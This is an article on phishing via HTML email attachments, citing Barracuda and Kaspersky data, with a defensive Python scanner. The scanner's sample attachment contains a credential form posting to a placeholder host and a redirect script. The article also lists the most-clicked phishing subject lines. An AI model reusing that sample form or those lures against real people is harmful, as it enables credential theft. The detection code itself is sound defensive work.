With brands, companies and organisations reaching out to consumers and audiences through email campaigns, tech-savvy con artists and identity thieves have long used email for phishing and scams. Among many other tricks, these miscreants also target employees by faking internal official emails.
According to a recent study by the IT security company Barracuda, 21% of all attachments embedded in emails were malicious.
Barracuda said it analysed data on millions of attachments scanned by its systems over the past month and found that HTML attachments were the type used most often for malicious purposes.
HTML attachments are commonly used in email communication. They are particularly common in system-generated email reports that users receive regularly; such messages contain URL links to the actual report, it said.
The security company added that attackers have been embedding HTML attachments in emails disguised as a weekly report, tricking users into clicking on phishing links. The technique works because the hacker no longer needs to include a malicious link in the email body itself, which makes it easy to bypass anti-spam and anti-virus policies.
These fake HTML attachments are used to steal credentials. They include a link to a phishing site which, when opened, redirects to a third-party machine that asks the user to enter credentials in order to access information or download a file that may contain malware.
The miscreants do not always need to create a fake website: they can embed a phishing form directly in the attachment, in effect sending the phishing site itself as an attachment rather than as a link.
Barracuda notes that because such HTML attachments are difficult to recognise precisely, and detection often produces many false positives, the ideal solutions are machine learning and static code analysis that evaluate the content of an email in order to identify and block malicious HTML attachments.
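As an added illustration of the static-analysis approach described above (example code written for this article, not Barracuda's product or method), the following Python script unpacks a constructed sample message and inspects its HTML attachment for the indicators the report mentions: a form posting credentials to an external host, a password field, and a script or meta-refresh redirect. The sample message, the domains and the heuristic indicators are all assumptions.

```python
import re
from email import message_from_string, policy
from html.parser import HTMLParser

# Constructed sample, not a real capture: a "weekly report" attachment with a credential form and a redirect.
SAMPLE_EML = """\
Subject: Weekly report
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; name="report.html"
Content-Disposition: attachment; filename="report.html"

<html><body><h1>Weekly report</h1>
<form action="https://collect.example.invalid/login" method="post">
Email <input name="user"> Password <input type="password" name="pass"></form>
<script>setTimeout(function(){window.location="https://redirect.example.invalid/r"},3000)</script>
</body></html>
--b1--
"""

class _Scanner(HTMLParser):
    """Collects static indicators: external form target, password field, redirect."""
    def __init__(self):
        super().__init__()
        self.hits, self._in_script = set(), False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").lower() for k, v in attrs}
        if tag == "form" and a.get("action", "").startswith(("http://", "https://")):
            self.hits.add("external_form_action")
        elif tag == "input" and a.get("type") == "password":
            self.hits.add("password_field")
        elif tag == "meta" and a.get("http-equiv") == "refresh":
            self.hits.add("redirect")
        self._in_script = tag == "script"
    def handle_endtag(self, tag):
        self._in_script = False
    def handle_data(self, data):  # script bodies arrive here as raw text
        if self._in_script and re.search(r"(window\.)?location(\.href)?\s*=", data):
            self.hits.add("redirect")

def scan_html_attachments(raw_eml):  # -> {attachment filename: sorted indicators}
    msg = message_from_string(raw_eml, policy=policy.default)
    findings = {}
    for part in msg.walk():
        if part.get_content_type() == "text/html" and part.get_filename():
            scanner = _Scanner()
            scanner.feed(part.get_content())
            findings[part.get_filename()] = sorted(scanner.hits)
    return findings
```

Calling scan_html_attachments(SAMPLE_EML) maps the attachment name to all three indicators, while a benign HTML report that only links to an internal page yields an empty list for that attachment.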
A 27 June report by cyber security company Kaspersky shows that “workers tend not to notice pitfalls hidden in emails devoted to corporate issues and delivery problem notifications. Almost one in five (16% to 18%) clicked the link in the email templates imitating these phishing attacks.”
Kaspersky noted that, according to recent phishing simulation campaigns, the five most effective types of phishing email are:
An email with the subject “Failed delivery attempt — Unfortunately, our courier was unable to deliver your item”, sent as “Mail delivery service”, which achieved a click rate of 18.5%.
An email with the subject “Emails not delivered due to overloaded mail servers”, sent as “The Google support team”, which achieved a click rate of 18%.
An email with the subject “Online employee survey: What would you improve about working at the company”, sent as “HR Department”, which achieved a click rate of 18%.
An email with the subject “Reminder: New company-wide dress code”, sent as “Human Resources”, which achieved a click rate of 17.5%.
An email with the subject “Attention all employees: new building evacuation plan”, sent as “Safety Department”, which achieved a click rate of 16%.
Other phishing emails that gained a significant number of clicks were reservation confirmations from a booking service (11%), a notification about an order placement (11%) and an IKEA contest announcement (10%).
On the other hand, emails that threaten the recipient or offer instant benefits appeared to be less “successful”. A template with the subject “I hacked your computer and know your search history” gained 2% of clicks, while offers of free Netflix and $1,000 for clicking a link tricked just 1% of employees.
According to Elena Molchanova, Head of Security Awareness Business Development at Kaspersky, phishing simulation is one of the simplest ways to track employees’ cyber-resilience and evaluate the effectiveness of their cybersecurity training. However, significant aspects must be considered when conducting such an assessment to make it truly impactful.